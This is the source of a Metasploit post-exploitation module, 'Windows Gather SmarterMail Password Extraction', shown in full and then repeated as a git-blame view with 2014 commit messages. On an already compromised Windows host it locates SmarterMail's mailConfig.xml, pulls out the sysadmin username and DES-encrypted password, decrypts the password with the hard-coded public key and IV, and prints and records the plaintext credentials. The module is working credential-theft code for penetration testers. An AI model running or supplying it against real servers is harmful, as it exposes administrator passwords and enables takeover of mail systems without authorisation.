metasploit-framework/modules/post/windows/gather/credentials/smartermail.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/auxiliary/report'

class Metasploit3 < Msf::Post

  include Msf::Post::File
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(
      info,
      'Name'          => 'Windows Gather SmarterMail Password Extraction',
      'Description'   => %q{
        This module extracts and decrypts the sysadmin password in the
        SmarterMail 'mailConfig.xml' configuration file. The encryption
        key and IV are publicly known.

        This module has been tested successfully on SmarterMail versions
        10.7.4842 and 11.7.5136.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
        'Joe Giron',                           # Discovery and PoC (@theonlyevil1)
        'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
        'sinn3r'                               # shell session support
      ],
      'References'    =>
        [
          ['URL', 'http://www.gironsec.com/blog/tag/cracking-smartermail/']
        ],
      'Platform'      => ['win'],
      'SessionTypes'  => ['meterpreter', 'shell']
    ))
  end

  def r_host
    if session.type =~ /meterpreter/
      session.sock.peerhost
    else
      session.session_host
    end
  end

  def peer
    if session.type =~ /meterpreter/
      "#{r_host} (#{sysinfo['Computer']})"
    else
      r_host
    end
  end

  #
  # Decrypt DES encrypted password string
  #
  def decrypt_des(encrypted)
    return nil if encrypted.nil?
    decipher = OpenSSL::Cipher::DES.new
    decipher.decrypt
    decipher.key = "\xb9\x9a\x52\xd4\x58\x77\xe9\x18"
    decipher.iv  = "\x52\xe9\xc3\x9f\x13\xb4\x1d\x0f"
    decipher.update(encrypted) + decipher.final
  end

  #
  # Find SmarterMail 'mailConfig.xml' config file
  #
  def get_mail_config_path
    found_path = ''
    drive = expand_path('%SystemDrive%').strip

    ['Program Files (x86)', 'Program Files'].each do |program_dir|
      path = %Q|#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml|.strip
      vprint_status "#{peer} - Checking for SmarterMail config file: #{path}"
      if file?(path)
        found_path = path
        break
      end
    end

    found_path
  end

  #
  # Retrieve username and decrypt encrypted password string from the config file
  #
  def get_smartermail_creds(path)
    result = {}
    data   = ''

    vprint_status "#{peer} - Retrieving SmarterMail sysadmin password"
    begin
      data = read_file(path)
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error "#{peer} - Failed to download #{path} - #{e.to_s}"
      return result
    end

    if data.blank?
      print_error "#{peer} - Configuration file is empty."
      return result
    end

    username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/)
    password = data.match(/<sysAdminPassword>(.+)<\/sysAdminPassword>/)
    result['username'] = username[1] unless username.nil?
    result['password'] = decrypt_des(Rex::Text.decode_base64(password[1])) unless password.nil?
    result
  end

  #
  # Find the config file, extract the encrypted password and decrypt it
  #
  def run
    # check for SmartMail config file
    config_path = get_mail_config_path
    if config_path.blank?
      print_error "#{peer} - Could not find SmarterMail config file"
      return
    end

    # retrieve username and decrypted password from config file
    result = get_smartermail_creds(config_path)
    if result['password'].nil?
      print_error "#{peer} - Could not decrypt password string"
      return
    end

    # report result
    user = result['username']
    pass = result['password']
    print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'"
    report_auth_info(
      :host  => r_host,
      :sname => 'http',
      :user  => user,
      :pass  => pass,
      :source_id   => session.db_record ? session.db_record.id : nil,
      :source_type => 'vuln')
  end
end
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`
Modify prints 2014-02-03 03:58:10 +00:00
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`require 'msf/core'`
			`require 'msf/core/auxiliary/report'`

			`class Metasploit3 < Msf::Post`
Update check_smartermail method Instead of using exception handling to determine the right path, the new method simply uses the file? method. It's also renamed as "get_mail_config_path" to properly describe its functionality. 2014-02-03 04:01:38 +00:00
			`include Msf::Post::File`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`include Msf::Auxiliary::Report`

Conform to style 2014-02-01 21:37:18 +00:00			`def initialize(info = {})`
			`super(update_info(`
			`info,`
			`'Name' => 'Windows Gather SmarterMail Password Extraction',`
			`'Description' => %q{`
			`This module extracts and decrypts the sysadmin password in the`
			`SmarterMail 'mailConfig.xml' configuration file. The encryption`
			`key and IV are publicly known.`
Modify prints 2014-02-03 03:58:10 +00:00
Conform to style 2014-02-01 21:37:18 +00:00			`This module has been tested successfully on SmarterMail versions`
			`10.7.4842 and 11.7.5136.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
Add support for shell session type 2014-02-03 05:37:56 +00:00			`'Joe Giron', # Discovery and PoC (@theonlyevil1)`
			`'Brendan Coles <bcoles[at]gmail.com>', # Metasploit`
			`'sinn3r' # shell session support`
Conform to style 2014-02-01 21:37:18 +00:00			`],`
			`'References' =>`
			`[`
			`['URL', 'http://www.gironsec.com/blog/tag/cracking-smartermail/']`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`],`
Conform to style 2014-02-01 21:37:18 +00:00			`'Platform' => ['win'],`
Add support for shell session type 2014-02-03 05:37:56 +00:00			`'SessionTypes' => ['meterpreter', 'shell']`
Conform to style 2014-02-01 21:37:18 +00:00			`))`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`end`

Add support for shell session type 2014-02-03 05:37:56 +00:00			`def r_host`
			`if session.type =~ /meterpreter/`
			`session.sock.peerhost`
			`else`
			`session.session_host`
			`end`
			`end`

Modify prints 2014-02-03 03:58:10 +00:00			`def peer`
Add support for shell session type 2014-02-03 05:37:56 +00:00			`if session.type =~ /meterpreter/`
			`"#{r_host} (#{sysinfo['Computer']})"`
			`else`
			`r_host`
			`end`
Modify prints 2014-02-03 03:58:10 +00:00			`end`

Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`#`
			`# Decrypt DES encrypted password string`
			`#`
Conform to style 2014-02-01 21:37:18 +00:00			`def decrypt_des(encrypted)`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`return nil if encrypted.nil?`
			`decipher = OpenSSL::Cipher::DES.new`
			`decipher.decrypt`
			`decipher.key = "\xb9\x9a\x52\xd4\x58\x77\xe9\x18"`
			`decipher.iv = "\x52\xe9\xc3\x9f\x13\xb4\x1d\x0f"`
Conform to style 2014-02-01 21:37:18 +00:00			`decipher.update(encrypted) + decipher.final`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`end`

			`#`
			`# Find SmarterMail 'mailConfig.xml' config file`
			`#`
Update check_smartermail method Instead of using exception handling to determine the right path, the new method simply uses the file? method. It's also renamed as "get_mail_config_path" to properly describe its functionality. 2014-02-03 04:01:38 +00:00			`def get_mail_config_path`
			`found_path = ''`
Add support for shell session type 2014-02-03 05:37:56 +00:00			`drive = expand_path('%SystemDrive%').strip`
Update check_smartermail method Instead of using exception handling to determine the right path, the new method simply uses the file? method. It's also renamed as "get_mail_config_path" to properly describe its functionality. 2014-02-03 04:01:38 +00:00
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`['Program Files (x86)', 'Program Files'].each do \|program_dir\|`
Add support for shell session type 2014-02-03 05:37:56 +00:00			`path = %Q\|#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml\|.strip`
Update check_smartermail method Instead of using exception handling to determine the right path, the new method simply uses the file? method. It's also renamed as "get_mail_config_path" to properly describe its functionality. 2014-02-03 04:01:38 +00:00			`vprint_status "#{peer} - Checking for SmarterMail config file: #{path}"`
			`if file?(path)`
			`found_path = path`
			`break`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`end`
			`end`
Update check_smartermail method Instead of using exception handling to determine the right path, the new method simply uses the file? method. It's also renamed as "get_mail_config_path" to properly describe its functionality. 2014-02-03 04:01:38 +00:00
			`found_path`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`end`

			`#`
			`# Retrieve username and decrypt encrypted password string from the config file`
			`#`
			`def get_smartermail_creds(path)`
Conform to style 2014-02-01 21:37:18 +00:00			`result = {}`
Be consistent with get_smartermail_creds method's return value 2014-02-03 04:06:14 +00:00			`data = ''`

Modify prints 2014-02-03 03:58:10 +00:00			`vprint_status "#{peer} - Retrieving SmarterMail sysadmin password"`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`begin`
Add support for shell session type 2014-02-03 05:37:56 +00:00			`data = read_file(path)`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`rescue Rex::Post::Meterpreter::RequestError => e`
Modify prints 2014-02-03 03:58:10 +00:00			`print_error "#{peer} - Failed to download #{path} - #{e.to_s}"`
Be consistent with get_smartermail_creds method's return value 2014-02-03 04:06:14 +00:00			`return result`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`end`
Be consistent with get_smartermail_creds method's return value 2014-02-03 04:06:14 +00:00
			`if data.blank?`
Modify prints 2014-02-03 03:58:10 +00:00			`print_error "#{peer} - Configuration file is empty."`
Be consistent with get_smartermail_creds method's return value 2014-02-03 04:06:14 +00:00			`return result`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`end`
Be consistent with get_smartermail_creds method's return value 2014-02-03 04:06:14 +00:00
Conform to style 2014-02-01 21:37:18 +00:00			`username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/)`
			`password = data.match(/<sysAdminPassword>(.+)<\/sysAdminPassword>/)`
			`result['username'] = username[1] unless username.nil?`
			`result['password'] = decrypt_des(Rex::Text.decode_base64(password[1])) unless password.nil?`
			`result`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`end`

			`#`
			`# Find the config file, extract the encrypted password and decrypt it`
			`#`
			`def run`
			`# check for SmartMail config file`
Update check_smartermail method Instead of using exception handling to determine the right path, the new method simply uses the file? method. It's also renamed as "get_mail_config_path" to properly describe its functionality. 2014-02-03 04:01:38 +00:00			`config_path = get_mail_config_path`
			`if config_path.blank?`
Modify prints 2014-02-03 03:58:10 +00:00			`print_error "#{peer} - Could not find SmarterMail config file"`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`return`
			`end`

			`# retrieve username and decrypted password from config file`
Conform to style 2014-02-01 21:37:18 +00:00			`result = get_smartermail_creds(config_path)`
			`if result['password'].nil?`
Modify prints 2014-02-03 03:58:10 +00:00			`print_error "#{peer} - Could not decrypt password string"`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`return`
			`end`

			`# report result`
Modify prints 2014-02-03 03:58:10 +00:00			`user = result['username']`
			`pass = result['password']`
			`print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'"`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`report_auth_info(`
Add support for shell session type 2014-02-03 05:37:56 +00:00			`:host => r_host,`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`:sname => 'http',`
Modify prints 2014-02-03 03:58:10 +00:00			`:user => user,`
			`:pass => pass,`
Add Windows Gather SmarterMail Password Extraction post module 2014-02-01 19:21:21 +00:00			`:source_id => session.db_record ? session.db_record.id : nil,`
			`:source_type => 'vuln')`
			`end`
			`end`